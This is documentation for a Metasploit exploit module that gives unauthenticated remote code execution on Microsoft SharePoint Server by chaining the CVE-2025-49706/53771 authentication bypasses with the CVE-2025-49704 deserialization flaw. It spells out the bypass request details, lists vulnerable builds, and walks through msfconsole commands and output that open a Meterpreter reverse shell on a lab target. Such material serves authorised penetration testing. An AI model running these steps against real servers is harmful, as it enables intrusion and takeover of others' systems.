documentation/modules/exploit/windows/http/sharepoint_toolpane_rce.md
This module exploits the authentication bypass vulnerabilities CVE-2025-49706 and CVE-2025-53771, and an unsafe
deserialization vulnerability CVE-2025-49704, to achieve unauthenticated RCE against a vulnerable Microsoft
SharePoint Server. The vulnerability CVE-2025-53770 was disclosed as being a patch bypass of CVE-2025-49704,
and as described by the finders, CVE-2025-53770 targets a different endpoint within the /_vti_bin/ URI path.
As this exploit module does not target the endpoint associated with CVE-2025-53770 (per the original finders),
we believe this module is best described as exploiting CVE-2025-49704 alone (and not CVE-2025-53770).
CVE-2025-49706 is an authentication bypass affecting Microsoft SharePoint Server, allowing a remote unauthenticated
attacker to reach the ToolPane page, located at the /_layouts/15/ToolPane.aspx URI. The auth bypass works if an
attacker supplies the following elements to an HTTP request:
/_layouts/SignOut.aspx, /_layouts/14/SignOut.aspx, or /_layouts/15/SignOut.aspx.DisplayMode with the value Edit./ToolPane.aspx, so long as this is the last query parameter.MSOTlPn_Uri with the full URL to the /_controltemplates/15/AclEditor.ascx endpoint.CVE-2025-53771 is a patch bypass for CVE-2025-49706. By appending a trailing / to the target
/_layouts/15/ToolPane.aspx URI, e.g. /_layouts/15/ToolPane.aspx/ a remote unauthenticated attacker can reach
the ToolPane page.
CVE-2025-49704 is an unsafe deserialization vulnerability due to bypassing a filter list to allow the instantiation of
LosFormatter and ObjectDataProvider in the diffgr:diffgram XML document, allowing us to kick off a second
stage deserialization gadget (which will be a TypeConfuseDelegate + LosFormatter gadget chain).
The July 8, 2025, patch for CVE-2025-49704 did not apply correctly to a SharePoint site that had not also manually run
a SharePoint configuration update. The patch for CVE-2025-49704 did not address the root cause, and instead marked the
Microsoft.PerformancePoint.Scorecards.Client assembly as unsafe. The July 19, 2025, patch for CVE-2025-53770
addresses the root cause of CVE-2025-49704 and does not rely on a manual configuration update to be performed in
order to be affective.
This exploit module has been successfully tested against the following versions:
16.0.10337.12109 - This is the RTM version. Is vulnerable to all 4 CVEs. Exploitation
is reliable.16.0.10417.20018 - This is the June 2025 patch level (KB 5002729). Is vulnerable to
all 4 CVEs. Exploitation is reliable.16.0.10417.20027 - This is the July 2025 patch level (KB 5002741). This patched
out CVE-2025-49704 and CVE-2025-49706, but is vulnerable to CVE-2025-53770 and CVE-2025-53771. Exploitation is
reliable unless the site administrator has manually performed a configuration update.Installing Microsoft SharePoint is non-trivial. This setup guide is a great step-by-step tutorial to get up and running.
After you install SharePoint, you must create a new site, bound to a new port. This is what the exploit will target.
NOTE: If you enable HTTPS, you will need to manually setup certificates via IIS Manager.
use exploit/windows/http/sharepoint_toolpane_rceConfigure the target:
set RHOST <TARGET_IP_ADDRESS>set RPORT <TARGET_HTTP_OR_HTTPS_PORT>set SSL true (If targeting HTTPS)Configure the payload:
NOTE: If testing with the default Meterpreter payloads, you will likely need to disable Defender.
set PAYLOAD cmd/windows/http/x64/meterpreter_reverse_tcpset LHOST eth0set LPORT 4444Run the exploit:
checkexploitmsf exploit(windows/http/sharepoint_toolpane_rce) > show options
Module options (exploit/windows/http/sharepoint_toolpane_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
RHOSTS 192.168.86.50 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/windows/http/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
FETCH_DELETE true yes Attempt to delete the binary after execution
FETCH_FILENAME ccMNrNsj no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces.
LHOST 192.168.86.122 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
Exploit target:
Id Name
-- ----
0 Default
View the full module info with the info, or info -d command.
msf exploit(windows/http/sharepoint_toolpane_rce) > check
[*] 192.168.86.50:80 - The target appears to be vulnerable. Detected Microsoft SharePoint Server 2019 version 16.0.10417.20027
msf exploit(windows/http/sharepoint_toolpane_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected Microsoft SharePoint Server 2019 version 16.0.10417.20027
[*] Meterpreter session 3 opened (192.168.86.122:4444 -> 192.168.86.50:62290) at 2025-07-23 12:58:41 +0100
meterpreter > sysinfo
Computer : WIN-V28QNSO2H05
OS : Windows Server 2022 (10.0 Build 20348).
Architecture : x64
System Language : en_US
Domain : TESTDOMAIN
Logged On Users : 24
Meterpreter : x64/windows
meterpreter > pwd
c:\windows\system32\inetsrv
meterpreter >
msf exploit(windows/http/sharepoint_toolpane_rce) > show options
Module options (exploit/windows/http/sharepoint_toolpane_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
RHOSTS 192.168.86.50 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/windows/generic):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD notepad.exe yes The command string to execute
Exploit target:
Id Name
-- ----
0 Default
View the full module info with the info, or info -d command.
msf exploit(windows/http/sharepoint_toolpane_rce) > exploit
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected Microsoft SharePoint Server 2019 version 16.0.10417.20027
[*] Exploit completed, but no session was created.
msf exploit(windows/http/sharepoint_toolpane_rce) >
You will be able to observe in Task Manager or Process Explorer that the w3wp.exe process has spawned cmd.exe which
has spawned notepad.exe.